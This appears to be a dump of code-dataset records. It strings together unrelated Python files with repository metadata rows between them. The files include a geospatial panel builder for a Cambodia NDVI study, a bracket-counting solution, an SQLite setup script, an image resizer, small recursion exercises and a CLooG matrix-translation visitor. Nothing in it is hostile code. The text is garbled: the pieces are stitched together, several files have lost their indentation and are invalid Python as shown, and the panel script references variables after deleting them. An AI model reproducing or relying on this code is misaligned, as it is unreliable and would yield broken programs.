rsp = request.urlopen(url)
data = rsp.read().decode()
data = json.loads(data)
print(data) | UTF-8 | Python | false | false | 302 | py | 61 | v20.py | 38 | 0.684783 | 0.648551 | 0 | 15 | 16.533333 | 102 |
aiddata/cambodia_ndvi_eval | 11,587,821,786,559 | c0186476b78a661c8d767537a27f1d973abd3f80 | 233aa254e724f21a0bdd8b85a690d71e9995cf74 | /build_panel.py | c2cde931988f2e847492c290a1045a8f5173ed43 | []
| no_license | https://github.com/aiddata/cambodia_ndvi_eval | 1fe06b7e36cdf492dd568767f446581c18e039c0 | cdc229af965ec037d5401b334f255993c125f944 | refs/heads/master | 2021-08-01T19:04:46.100048 | 2021-07-30T18:31:40 | 2021-07-30T18:31:40 | 182,141,664 | 1 | 0 | null | false | 2019-10-04T18:34:29 | 2019-04-18T18:55:37 | 2019-08-26T15:00:18 | 2019-10-04T18:34:28 | 69 | 1 | 0 | 0 | Python | false | false |
# set a directory to store output data. I dont specify Box as the filepath because the
# output file is too large to store in Box. You will have to make sure
# in your temporary directory, you must have the dissolved buffered village shapefile,
# the Hansen treecover raster, NDVI raster data for 1999-2018 (separate files stored
# in a folder called "ndvi"), temperature rasters for 2001-2017 (separate files stored
# in a folder called "temperature"), precip rasters for 1999-2017 (separate files stored
# in a folder called "precipitation"), a plantations shapefile (in a folder called
# "plantations"), a concessions shapefile (in a folder called "concessions"), and a
# protected areas shapefile (in a folder called "protected_areas"), as well as the roads
# shapefile
working_dir = '/sciclone/home20/cbaehr/cambodia_gie/inputData'
out_dir = '/sciclone/home20/cbaehr/cambodia_gie/processedData'
# working_dir = 'C:/Users/cbaehr/Downloads'
# overwrite output files?
overwrite = True
import fiona
import itertools
import math
import numpy as np
import pandas as pd
from shapely.geometry import shape, Point, MultiPoint, MultiPolygon
from shapely.prepared import prep
import csv
from osgeo import gdal, ogr
import sys
import errno
import geopandas
from rasterio import features
from affine import Affine
from rasterstats.io import read_features
#################################################
# define function to extract raster values for each grid cell
def getValuesAtPoint(indir, rasterfileList, pos, lon, lat, cell_id):
#gt(2) and gt(4) coefficients are zero, and the gt(1) is pixel width, and gt(5) is pixel height.
#The (gt(0),gt(3)) position is the top left corner of the top left pixel of the raster.
for i, rs in enumerate(rasterfileList):
presValues = []
gdata = gdal.Open('{}/{}.tif'.format(indir,rs))
gt = gdata.GetGeoTransform()
band = gdata.GetRasterBand(1)
nodata = band.GetNoDataValue()
x0, y0 , w , h = gt[0], gt[3], gt[1], gt[5]
data = band.ReadAsArray().astype(np.float)
params = data.shape
#free memory
del gdata
if i == 0:
#iterate through the points
for p in pos.iterrows():
x = int((p[1][lon] - x0)/w)
y = int((p[1][lat] - y0)/h)
if y < params[0] and x < params[1]:
val = data[y,x]
else:
val = -9999
presVAL = [p[1][cell_id], p[1][lon], p[1][lat], val]
presValues.append(presVAL)
df = pd.DataFrame(presValues, columns=['cell_id', 'x', 'y', rs])
else:
#iterate through the points
for p in pos.iterrows():
x = int((p[1][lon] - x0)/w)
y = int((p[1][lat] - y0)/h)
if y < params[0] and x < params[1]:
val = data[y,x]
else:
val = -9999
presValues.append(val)
df[rs] = pd.Series(presValues)
del data, band
return df
# load in empty grid
grid = pd.read_csv(working_dir+'/empty_grid.csv')
##################################################
# list of file names for NDVI rasters
rasters = ['ndvi_'+str(year) for year in range(1999, 2019)]
# extract NDVI raster values for each grid cell
ndvi = getValuesAtPoint(indir=working_dir+'/ndvi', rasterfileList=rasters, pos=grid, lon='lon', lat='lat', cell_id='cell_id')
# merge NDVI data with main grid
full_grid = pd.concat([grid['cell_id'].reset_index(drop=True), ndvi.drop(['cell_id','x','y'], axis=1).reset_index(drop=True)], axis=1)
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
###
# list of file names for temperature rasters
rasters = ['temp_'+str(year) for year in range(2001, 2018)]
# extract temperature raster values for each grid cell
temp = getValuesAtPoint(indir=working_dir+'/temperature', rasterfileList=rasters, pos=grid, lon='lon', lat='lat', cell_id='cell_id')
# merge temperature data with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), temp.drop(['cell_id','x','y'], axis=1).reset_index(drop=True)], axis=1)
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
###
# list of file names for precipitation rasters
rasters = ['precip_'+str(year) for year in range(1999, 2018)]
# extract precipitation raster values for each grid cell
precip = getValuesAtPoint(indir=working_dir+'/precipitation', rasterfileList=rasters, pos=grid, lon='lon', lat='lat', cell_id='cell_id')
# merge precipitation data with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), precip.drop(['cell_id','x','y'], axis=1).reset_index(drop=True)], axis=1)
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
###
# list of file names for nighttime lights rasters
rasters = ['ntl_'+str(year) for year in range(1999, 2014)]
# extract nighttime lights raster values for each grid cell
ntl = getValuesAtPoint(indir=working_dir+'/ntl', rasterfileList=rasters, pos=grid, lon='lon', lat='lat', cell_id='cell_id')
# merge nighttime lights data with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), ntl.drop(['cell_id','x','y'], axis=1).reset_index(drop=True)], axis=1)
del ndvi, temp, precip, ntl
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
####################################################
# load plantations shapefile and prepare to merge with grid
plantations = fiona.open(working_dir+'/plantations/plantations.shp')
plantations = plantations[0]
plantations = shape(plantations['geometry'])
prep_plantations = prep(plantations)
# load concessions shapefile and prepare to merge with grid
concessions = fiona.open(working_dir+'/concessions/concessions.shp')
concessions = concessions[0]
concessions = shape(concessions['geometry'])
prep_concessions = prep(concessions)
# load protected areas shapefile and prepare to merge with grid
protected_areas = fiona.open(working_dir+'/protected_areas/protected_areas.shp')
protected_areas = protected_areas[0]
protected_areas = shape(protected_areas['geometry'])
prep_protected_areas = prep(protected_areas)
# create empty lists to store land designation dummies
plantations_col = []
concessions_col = []
protected_areas_col = []
# iterate through each grid cell to determine whether it intersects a plantation,
# concession, or PA
for _, row in grid.iterrows():
c = Point(row['lon'], row['lat'])
plantations_col.append(prep_plantations.intersects(c))
concessions_col.append(prep_concessions.intersects(c))
protected_areas_col.append(prep_protected_areas.intersects(c))
# create empty df to store land designation dummies
land_designation = pd.DataFrame()
land_designation.insert(loc=0, column='plantation', value=plantations_col)
land_designation.insert(loc=1, column='concession', value=concessions_col)
land_designation.insert(loc=2, column='protected_area', value=protected_areas_col)
# merge land designation df with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), land_designation.reset_index(drop=True)], axis=1)
del plantations, concessions, protected_areas, prep_plantations, prep_concessions, prep_protected_areas
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
#################################################
# load in road distance rasters and extract road distance values for each grid cell
road_distance = getValuesAtPoint(indir=working_dir, rasterfileList=['road_distance'], pos=grid, lon='lon', lat='lat', cell_id='cell_id')
# merge road distance data with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), road_distance['road_distance'].reset_index(drop=True)], axis=1)
del road_distance
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
####################################################
# load in treatment shapefile as geopandas data
treatment = geopandas.read_file(working_dir+'/buf_trt_villages/buf_trt_villages.shp')
# process treatment geometry and convert to geoDataFrame
geometry = [Point(xy) for xy in zip(grid.lon, grid.lat)]
crs = {'init': 'epsg:4326'}
gdf = geopandas.GeoDataFrame(grid['cell_id'], crs=crs, geometry=geometry)
# join treatment data with grid cells. Each grid cell will be assigned a number of
# treatments and when each treatment project was completed
treatment_grid = geopandas.sjoin(gdf, treatment[['end_years', 'geometry']], how='left', op='intersects')
treatment_grid = treatment_grid[['cell_id', 'end_years']]
# break up treatment information by year
treatment_grid = treatment_grid.pivot_table(['end_years'], 'cell_id', aggfunc='|'.join)
treatment_grid = treatment_grid['end_years'].tolist()
# this function converts treatment info from string to numeric
def build(year_str):
j = year_str.split('|')
return {i:j.count(i) for i in set(j)}
# apply function to treatment data
year_dicts = list(map(build, treatment_grid))
# convert treatment data to pandas df
treatment = pd.DataFrame(year_dicts)
treatment = treatment.fillna(0)
# fill any empty years with zero values
for i in range(2003, 2019):
if str(i) not in treatment.columns:
treatment[str(i)] = 0
treatment = treatment.reindex(sorted(treatment.columns), axis=1)
# convert treatment count to cumulative count
treatment = treatment.apply(np.cumsum, axis=1)
# rename treatment columns
treatment.columns = ['trt_'+str(i) for i in range(2003, 2019)]
# merge treatment data with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), treatment.reset_index(drop=True)], axis=1)
###
# load in tiered treatment shapefile (1km, 2km, 3km)
multi_treatment = geopandas.read_file(working_dir+'/multi_buf_trt_villages/multi_buf_trt_villages.shp')
# build 1km treatment measure
treatment_grid_1k = geopandas.sjoin(gdf, multi_treatment[multi_treatment['dist']=='1000'], how='left', op='intersects')
treatment_grid_1k = treatment_grid_1k[['cell_id', 'end_years']]
treatment_grid_1k['end_years'] = treatment_grid_1k['end_years'].fillna('2002')
treatment_grid_1k = treatment_grid_1k.pivot_table(['end_years'], 'cell_id', aggfunc='|'.join, dropna=False, fill_value=np.nan)
treatment_grid_1k = treatment_grid_1k['end_years'].tolist()
year_dicts = list(map(build, treatment_grid_1k))
treatment_1k = pd.DataFrame(year_dicts)
treatment_1k.drop(['2002'], axis=1, inplace=True)
treatment_1k = treatment_1k.fillna(0)
for i in range(2003, 2019):
if str(i) not in treatment_1k.columns:
treatment_1k[str(i)] = 0
treatment_1k = treatment_1k.reindex(columns=sorted(treatment_1k.columns))
treatment_1k = treatment_1k.apply(np.cumsum, axis=1)
treatment_1k.columns = ['trt1k_'+str(i) for i in range(2003, 2019)]
# merge 1km treatment measure with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), treatment_1k.reset_index(drop=True)], axis=1)
###
# build 2km treatment measure
treatment_grid_2k = geopandas.sjoin(gdf, multi_treatment[multi_treatment['dist']=='2000'], how='left', op='intersects')
treatment_grid_2k = treatment_grid_2k[['cell_id', 'end_years']]
treatment_grid_2k['end_years'] = treatment_grid_2k['end_years'].fillna('2002')
treatment_grid_2k = treatment_grid_2k.pivot_table(['end_years'], 'cell_id', aggfunc='|'.join, dropna=False, fill_value=np.nan)
treatment_grid_2k = treatment_grid_2k['end_years'].tolist()
year_dicts = list(map(build, treatment_grid_2k))
treatment_2k = pd.DataFrame(year_dicts)
treatment_2k.drop(['2002'], axis=1, inplace=True)
treatment_2k = treatment_2k.fillna(0)
for i in range(2003, 2019):
if str(i) not in treatment_2k.columns:
treatment_2k[str(i)] = 0
treatment_2k = treatment_2k.reindex(columns=sorted(treatment_2k.columns))
treatment_2k = treatment_2k.apply(np.cumsum, axis=1)
treatment_2k.columns = ['trt2k_'+str(i) for i in range(2003, 2019)]
# merge 2km treatment measure with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), treatment_2k.reset_index(drop=True)], axis=1)
###
# build 3km treatment measure
treatment_grid_3k = geopandas.sjoin(gdf, multi_treatment[multi_treatment['dist']=='3000'], how='left', op='intersects')
treatment_grid_3k = treatment_grid_3k[['cell_id', 'end_years']]
treatment_grid_3k['end_years'] = treatment_grid_3k['end_years'].fillna('2002')
treatment_grid_3k = treatment_grid_3k.pivot_table(['end_years'], 'cell_id', aggfunc='|'.join, dropna=False, fill_value=np.nan)
treatment_grid_3k = treatment_grid_3k['end_years'].tolist()
year_dicts = list(map(build, treatment_grid_3k))
treatment_3k = pd.DataFrame(year_dicts)
treatment_3k.drop(['2002'], axis=1, inplace=True)
treatment_3k = treatment_3k.fillna(0)
for i in range(2003, 2019):
if str(i) not in treatment_3k.columns:
treatment_3k[str(i)] = 0
treatment_3k = treatment_3k.reindex(columns=sorted(treatment_3k.columns))
treatment_3k = treatment_3k.apply(np.cumsum, axis=1)
treatment_3k.columns = ['trt3k_'+str(i) for i in range(2003, 2019)]
# merge 3km treatment measure with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), treatment_3k.reset_index(drop=True)], axis=1)
del treatment, treatment_grid, treatment_grid_1k, treatment_1k, treatment_grid_2k, treatment_2k, treatment_grid_3k, treatment_3k, year_dicts, multi_treatment
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
#################################################
# load in province and commune shapefiles
provinces = geopandas.read_file(working_dir+'/KHM_ADM1/KHM_ADM1.shp')
communes = geopandas.read_file(working_dir+'/KHM_ADM3/KHM_ADM3.shp')
# merge grid cells with province data
gdf = geopandas.sjoin(gdf, provinces[['id', 'geometry']], how='left', op='intersects')
# merge grid cells with commune data
gdf = geopandas.sjoin(gdf.drop(['index_right'],axis=1), communes[['id', 'geometry']], how='left', op='intersects')
# rename ADM dataset
gdf = gdf[['id_left', 'id_right']]
gdf.columns = ['province', 'commune']
# merge ADM dataset with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), gdf[['province', 'commune']].reset_index(drop=True)], axis=1)
del geometry, gdf, provinces, communes
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
#################################################
# load in CGEO shapefiles and prepare for merging with grid cells
bombings = fiona.open(working_dir+'/cgeo/khmer_bombings/khmer_bombings.shp')
bombings = bombings[0]
bombings = shape(bombings['geometry'])
prep_bombings = prep(bombings)
burials = fiona.open(working_dir+'/cgeo/khmer_burials/khmer_burials.shp')
burials = burials[0]
burials = shape(burials['geometry'])
prep_burials = prep(burials)
memorials = fiona.open(working_dir+'/cgeo/khmer_memorials/khmer_memorials.shp')
memorials = memorials[0]
memorials = shape(memorials['geometry'])
prep_memorials = prep(memorials)
prisons = fiona.open(working_dir+'/cgeo/khmer_prisons/khmer_prisons.shp')
prisons = prisons[0]
prisons = shape(prisons['geometry'])
prep_prisons = prep(prisons)
# create empty lists to store Khmer exposure indicators for each grid cell
bombings_col = []
burials_col = []
memorials_col = []
prisons_col = []
# building Khmer exposure dummies
for _, row in grid.iterrows():
c = Point(row['lon'], row['lat'])
bombings_col.append(prep_bombings.intersects(c))
burials_col.append(prep_burials.intersects(c))
memorials_col.append(prep_memorials.intersects(c))
prisons_col.append(prep_prisons.intersects(c))
# combine Khmer exposure dummies into a pandas df
khmer_exposure = pd.DataFrame()
khmer_exposure.insert(loc=0, column='bombings', value=bombings_col)
khmer_exposure.insert(loc=1, column='burials', value=burials_col)
khmer_exposure.insert(loc=2, column='memorials', value=memorials_col)
khmer_exposure.insert(loc=3, column='prisons', value=prisons_col)
# merge Khmer dummies with main grid
full_grid = pd.concat([full_grid.reset_index(drop=True), khmer_exposure.reset_index(drop=True)], axis=1)
del bombings, burials, memorials, prisons, prep_bombings, prep_burials, prep_memorials, prep_prisons, bombings_col, burials_col, memorials_col, prisons_col, khmer_exposure
#if overwrite:
# full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
#################################################
# to use the reshaping function, need to have same number of columns for each time-variant measure
# so need to fill missing years with zero or NA values for some measures
for i in range(1999, 2003):
full_grid['trt_'+str(i)] = 0
full_grid['trt1k_'+str(i)] = 0
full_grid['trt2k_'+str(i)] = 0
full_grid['trt3k_'+str(i)] = 0
for i in list(range(1999, 2001))+[2018]:
full_grid['temp_'+str(i)] = 'NA'
full_grid['precip_2018'] = 'NA'
for i in range(2014, 2019):
full_grid['ntl_'+str(i)] = 'NA'
# reorder columns in main dataset
new_names = ['cell_id', 'commune', 'province', 'plantation', 'concession', 'protected_area', 'road_distance', 'bombings', 'burials', 'memorials', 'prisons'] + ['ndvi_' + str(i) for i in range(1999, 2019)] + ['trt_' + str(i) for i in range(1999, 2019)] + ['trt1k_' + str(i) for i in range(1999, 2019)] + ['trt2k_' + str(i) for i in range(1999, 2019)] + ['trt3k_' + str(i) for i in range(1999, 2019)] + ['temp_' + str(i) for i in range(1999, 2019)] + ['precip_' + str(i) for i in range(1999, 2019)] + ['ntl_' + str(i) for i in range(1999, 2019)]
full_grid = full_grid[new_names]
# drop observations with missing cell ID
full_grid.dropna(axis=0, subset=['cell_id'], inplace=True)
# write "pre panel" to csv file
if overwrite:
full_grid.to_csv(out_dir+'/pre_panel.csv', index=False)
# identify column indices for each time-variant measure. Will need these indices for reshaping
headers = [str(i) for i in range(1999, 2019)]
ndvi_index = ['ndvi' in i for i in full_grid.columns]
trt_index = ['trt' in i for i in full_grid.columns]
trt1k_index = ['trt1k' in i for i in full_grid.columns]
trt2k_index = ['trt2k' in i for i in full_grid.columns]
trt3k_index = ['trt3k' in i for i in full_grid.columns]
temp_index = ['temp' in i for i in full_grid.columns]
precip_index = ['precip' in i for i in full_grid.columns]
ntl_index = ['ntl' in i for i in full_grid.columns]
del full_grid
# reshape panel from wide to long form
with open(out_dir+'/pre_panel.csv') as f, open(out_dir+'/panel.csv', 'w') as f2:
# first line of the csv is variable names
a=f2.write('cell_id,year,commune,province,plantation,concession,protected_area,road_distance,bombings,burials,memorials,prisons,ndvi,trt,trt1k,trt2k,trt3k,temp,precip,ntl\n')
# performing transformation one grid cell at a time
for i, line in enumerate(f):
if i != 0:
x = line.strip().split(',')
cell, commune, province, plantation, concession, protected, distance = x[0:7]
ndvi = list(itertools.compress(x, ndvi_index))
trt = list(itertools.compress(x, trt_index))
trt1k = list(itertools.compress(x, trt1k_index))
trt2k = list(itertools.compress(x, trt2k_index))
trt3k = list(itertools.compress(x, trt3k_index))
temp = list(itertools.compress(x, temp_index))
precip = list(itertools.compress(x, precip_index))
ntl = list(itertools.compress(x, ntl_index))
for year, ndvi_out, trt_out, trt1k_out, trt2k_out, trt3k_out, temp_out, precip_out, ntl_out in zip(headers, ndvi, trt, trt1k, trt2k, trt3k, temp, precip, ntl):
a=f2.write(','.join([cell, year, commune, province, plantation, concession, protected, distance, bombings, burials, memorials, prisons, ndvi_out, trt_out, trt1k_out, trt2k_out, trt3k_out, temp_out, precip_out, ntl_out])+'\n')
| UTF-8 | Python | false | false | 19,740 | py | 25 | build_panel.py | 14 | 0.686424 | 0.661905 | 0 | 465 | 41.445161 | 543 |
Einere/boostcamp_study | 13,365,938,240,339 | 173296a52c59895d33773e2fed773b3908526dbe | 18c241e02f09a40ace628531605ffceab65184f9 | /lgy/algorithm/10799 쇠막대기.py | 30919e44834b1e1aa0585fb622813e3b0dcae740 | [
"MIT"
]
| permissive | https://github.com/Einere/boostcamp_study | 54b18de2205dbfb9b9f532008e951d82cac8313f | 63a52253c0ee01354a81dcac6349cc84d738b9ca | refs/heads/master | 2020-06-08T22:37:24.675128 | 2019-07-05T06:24:38 | 2019-07-05T06:24:38 | 193,319,107 | 2 | 1 | MIT | false | 2019-07-05T05:08:50 | 2019-06-23T07:30:51 | 2019-07-03T06:03:27 | 2019-07-05T05:08:50 | 46 | 1 | 1 | 0 | Java | false | false | def main():
ans = 0
mystack = []
flag = False
paren = input()
intstack = []
answer = 0
last = 0
for idx, ch in enumerate(paren): # O(n)
if ch == '(':
mystack.append(ch)
intstack.append(1)
flag = True
if ch == ')':
mystack.pop()
if flag:
if len(mystack) == 0:
intstack.pop()
continue
intstack.pop()
ans += len(intstack)
else:
ans += intstack[-1]
intstack.pop()
flag = False
print(ans)
main() | UTF-8 | Python | false | false | 653 | py | 61 | 10799 쇠막대기.py | 54 | 0.382848 | 0.37366 | 0 | 33 | 18.818182 | 44 |
matibraun/mercadolibre_scrapper | 4,088,808,909,600 | 2d06d762aa331b32a596a25a30d9125f37a318cb | 65d975314010207027ebd50e733af53df2dc4d4f | /create_database.py | 01d9335bb79eab551e4108e32faa62e03f88b952 | []
| no_license | https://github.com/matibraun/mercadolibre_scrapper | e167984994e328f7c5f2b3f9044f8cb6f2370c21 | 178f640669e586435963fb034c1b80fcc4aa045c | refs/heads/master | 2023-07-21T12:17:53.207525 | 2021-08-01T13:00:53 | 2021-08-01T13:00:53 | 292,346,991 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sqlite3
def create_database():
try:
import sqlite3
ml_scrapper = sqlite3.connect('ml_scrapper.db')
cursor = ml_scrapper.cursor()
cursor.execute("CREATE TABLE ESCOBAR (index_ INTEGER, geographic_area TEXT, price_symbol VARCHAR (10), price INTEGER, surface_description TEXT, surface_symbol VARCHAR (10), surface_total INTEGER, surface_from INTEGER, surface_to INTEGER, link TEXT)")
ml_scrapper.commit()
ml_scrapper.close()
print ('Database created successfully\n')
except sqlite3.OperationalError:
pass | UTF-8 | Python | false | false | 584 | py | 7 | create_database.py | 6 | 0.683219 | 0.669521 | 0 | 17 | 33.411765 | 258 |
lostsquirrel/python_test | 5,025,111,748,757 | 332c28f9fa580ef835e4e3652a47abb93947e380 | fc629dba07e98bfd44a671112f47091ad8935631 | /read_books/edu/hit/guide/test.py | a520402d5cdd27d94728ffe0c9696f2e63cfff5d | []
| no_license | https://github.com/lostsquirrel/python_test | c990e0c29bdf2eecae9411983b68d1f984afac84 | eb171b45bbf2f29cd1307aefd8e4609b683773d8 | refs/heads/master | 2022-09-01T11:30:16.847626 | 2022-05-18T07:43:49 | 2022-05-18T07:43:49 | 9,890,003 | 0 | 1 | null | false | 2022-05-18T07:43:49 | 2013-05-06T15:35:24 | 2021-12-02T10:04:35 | 2022-05-18T07:43:49 | 315 | 0 | 1 | 0 | Python | false | false | '''
Created on May 12, 2015
@author: lisong
'''
def gcd(m, n):
r = m % n
if r == 0:
return n
else:
r = m % n
return gcd(n, r)
print gcd(384, 84)
if __name__ == '__main__':
pass | UTF-8 | Python | false | false | 213 | py | 216 | test.py | 208 | 0.455399 | 0.399061 | 0 | 15 | 13.266667 | 26 |
alex4814/algo-solution | 6,657,199,331,794 | 8517581eb3f5dbec30b25eb484b51888cb9f69eb | 7babdd66023024927ef33ea9685f14b7732cac5e | /project-euler/python2/022.py | 4fcfeb79153908ed918aaaa5d00cbbf147a74df7 | []
| no_license | https://github.com/alex4814/algo-solution | 2f458961b02e4e0348d4283f2ed034b7fca4f537 | f3478bad3a36fe6eff8665718b63f3475370f028 | refs/heads/master | 2021-01-21T04:35:18.212839 | 2020-08-02T03:27:18 | 2020-08-02T03:27:18 | 24,101,204 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def name_score(name):
return sum(ord(c) - ord('A') + 1 for c in name)
with open('p022_names.txt') as f:
names = f.read().split(',')
names = [name.strip('"') for name in names]
names.sort()
print sum((i+1) * name_score(name) for i, name in enumerate(names))
| UTF-8 | Python | false | false | 275 | py | 518 | 022.py | 486 | 0.603636 | 0.585455 | 0 | 9 | 29.555556 | 67 |
brianshen1990/KeepLearning | 14,267,881,388,276 | 6befa83ec00a47fea96c3b58c379b3b686943157 | 6ef9dff586c4411251710396c27b97c6a5c701ee | /Coursera/Python_IT_Google/T06/C04/changeImage.py | 8053b8fb7fac27986428d5b8a8e811caaa8019e1 | [
"MIT"
]
| permissive | https://github.com/brianshen1990/KeepLearning | 57ecba54705d389b6ae6067daa1aad03c2ddf10b | e15092fc639cc14cd191b6748e4ee0e23f02930e | refs/heads/master | 2022-05-29T08:33:50.693135 | 2022-05-28T12:48:57 | 2022-05-28T12:48:57 | 252,941,917 | 4 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
from PIL import Image
import os
import re
src = "./supplier-data/images/"
dst = "./supplier-data/images/"
def main():
# read all images
fileslist = []
for root, dirs, files in os.walk(src):
for name in files:
if str(name).endswith(".tiff"):
fileslist.append(name)
# print(fileslist)
for image in fileslist:
im = Image.open(src + image)
final_name = re.sub(r".tiff$", ".jpeg", image)
final_name = dst + final_name
print(src + image + " => " + final_name)
im.resize((600,400)).convert("RGB").save(final_name, 'jpeg')
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 634 | py | 1,325 | changeImage.py | 1,188 | 0.599369 | 0.588328 | 0 | 28 | 21.571429 | 64 |
AakashJaswal/Python | 7,971,459,332,668 | 7ffaf7e9092a6ba0cd20785efbe3cef5ecaea5e8 | c5b8ed383f09ede5ed238dd316986a80d4a97300 | /CCPractice/1.Recursion/recusive.py | 5ef8820fd3cb71982d9375bf026011a4c8e2f921 | []
| no_license | https://github.com/AakashJaswal/Python | 3d4f49fc37c946191856d91058636836045f332f | fec47f235e089c980c944480e27ecefe5366685c | refs/heads/master | 2023-01-30T22:33:50.575415 | 2022-10-07T03:15:18 | 2022-10-07T03:15:18 | 296,155,681 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | def rec(n):
if n < 1:
return 1
else:
return n * rec(n - 1)
def fib(counter, final, a=0, b=1):
if counter >= final:
print("")
return 1
else:
print(a, end=" ")
a, b, counter = b, a + b, counter + 1
fib(counter, final, a, b)
def fib_hard_counter(final, a=0, b=1):
if a >= final:
print("")
return 1
else:
print(a, end=" ")
a, b = b, a + b
fib_hard_counter(final, a, b)
num = int(input("Enter a number to find factorial for: "))
print(rec(num))
counter = int(input("Enter how many fibonacci no you need: "))
fib(0, counter)
hard_limit = int(input("Enter upto how many fibonacci no you need: "))
fib_hard_counter(hard_limit) | UTF-8 | Python | false | false | 747 | py | 29 | recusive.py | 28 | 0.534137 | 0.519411 | 0 | 36 | 19.777778 | 70 |
lamielle/iegen | 5,334,349,416,629 | a7213c54a06f606b38cdb2d6ea12070f062c867a | 07aa9b5a07df2a80b7d899da1da63c84b1060fec | /src/iegen/ast/visitor/_trans_visitor.py | 6e912b59c68098ac2632c6438b39c345eeccba05 | []
| no_license | https://github.com/lamielle/iegen | f26da812a01557daca086e0a1c76a62af8fe7cd4 | 0f48edad8d14ae18c907d705751552cf6eb53c8e | refs/heads/master | 2016-09-05T12:48:23.698779 | 2010-12-14T19:17:13 | 2010-12-14T19:17:13 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from iegen.ast.visitor import DFVisitor
#Translation Visitor: Translate the visited Set or Relation into
# a matrix representing a domain or scattering function in
# CLooG format.
#
#Briefly, this format is a matrix that represents a polyhedron.
#Each row of the matrix is one constraint, either equality or inequality.
#
#For domain constraint matrices, the columns are ordered as follows:
#eq/in iterators parameters constant
#Col 1: {0,1} 0=equality 1=inequality
#Col 2-num iterators+1: coefficients on the iterators in this constraint
#Col num iterators+2-num iterators+num parameters+1: coefficients on the
# parameters (symbolics)
#Col num iterators+num parameters+2: constraint constant
#
#For scattering function constraint matrices, the columns are ordered as follows:
#eq/in out-vars in-vars parameters constant
#Col 1: {0,1} 0=equality 1=inequality
#Col 2-num out-vars+1: identity row (1 for associated out var, 0s elsewhere)
#Col num out-vars+2-num out-vars num in-vars+1: input var coefficients
#Col num out-vars+num in-vars+2-num out-vars+num in-vars+num params+1: parameter coefficients
#Col num out-vars+num in-vars+num params+2: constraint constant
#
#Multiple conjunctions of PresSet objects in the Set (for a domain)
# will be translated to a collection of constraint matrices
# (a union of polyhedra).
#Multiple conjunctions of PresRelation objects in the Relation
# are not supported, a ValueError will be raised if this is detected.
#
#This visitor requires as input a collection of names of parameters.
#This is needed so that multiple uses of this visitor have the same parameter
# columns in common.
#
#The result of this visitor is placed in the mats attribute.
#In the case of a domain (Set) this may have multiple matrices.
#In the case of a scattering function (Relation) this will have a single matrix.
class TransVisitor(DFVisitor):
def __init__(self,params):
self.params=params
self.at_var_tuple=False
#init the result list
self.mats=[]
#---------- Visiting state variables ----------
#Are we within a Set?
self.in_set=False
#Are we within a Relation?
self.in_relation=False
#Dictionary of name -> column position mappings
self.name_dict=None
#----------------------------------------------
def calc_name_dict(self,var_names):
names=var_names+self.params
name_dict={}
for pos,name in enumerate(names):
name_dict[name]=pos+1
return name_dict
#Calculates the number of columns in the matrix we are creating
def calc_num_cols(self):
#1 column for the eq/in column
#len(self.name_dict) columns
#1 column for the constant column
return 1+len(self.name_dict)+1
def inPresSet(self,node):
#Starting to translate a PresSet to a matrix, init the result matrix
self._mat=[]
#Build mappings for tuple variables and symbolics to column index
self.name_dict=self.calc_name_dict([var.id for var in node.tuple_set.vars])
def outPresSet(self,node):
#Append the current result matrix to the result matrix collection
self.mats.append(self._mat)
def inRelation(self,node):
#Make sure this Relation has only a single conjunction
if len(node.relations)!=1:
raise ValueError('Translation of multiple Relation conjunctions is not supported')
def inPresRelation(self,node):
#Starting to translate a PresRelation to a matrix, init the result matrix
self._mat=[]
#Build mappings for tuple variables and symbolics to column index
self.name_dict=self.calc_name_dict([var.id for var in node.tuple_out.vars+node.tuple_in.vars])
def outPresRelation(self,node):
self.mat=self._mat
def inVarTuple(self,node):
self.at_var_tuple=True
def outVarTuple(self,node):
self.at_var_tuple=False
def inInequality(self,node):
#Create a new row for an inequality constraint
self._row=[0]*self.calc_num_cols()
self._row[0]=1
def outInequality(self,node):
self._mat.append(self._row)
def inEquality(self,node):
#Create a new row for an equality constraint
self._row=[0]*self.calc_num_cols()
self._row[0]=0
def outEquality(self,node):
self._mat.append(self._row)
def inVarExp(self,node):
if not self.at_var_tuple:
#Get the column of this variable in the matrix
try:
pos=self.name_dict[node.id]
#Assign this variable's coefficient to the matrix in the proper column
self._row[pos]=node.coeff
except KeyError,e:
raise ValueError("Variable '%s' is either a free variable or was not specified as a parameter"%(node.id))
#Cannot translate formulas with functions
def inFuncExp(self,node):
raise ValueError('Translation of function expressions is not supported.')
def inNormExp(self,node):
#Set the last element in the row to the constant value of the expression
self._row[-1]=node.const
| UTF-8 | Python | false | false | 4,734 | py | 225 | _trans_visitor.py | 164 | 0.739332 | 0.731517 | 0 | 140 | 32.814286 | 109 |
ChadShoeby/baseballBot | 5,935,644,810,455 | 51d07e2c0c3a5d7819adc60b56466b77de6ec9fd | deb32700ef636086754b8b60ff55a9cd18de08f6 | /baseballBot/frontoffice/models/ManagerProfile.py | b68ec6d9167aaf2e67180e255ebca2a3ea5c1b76 | []
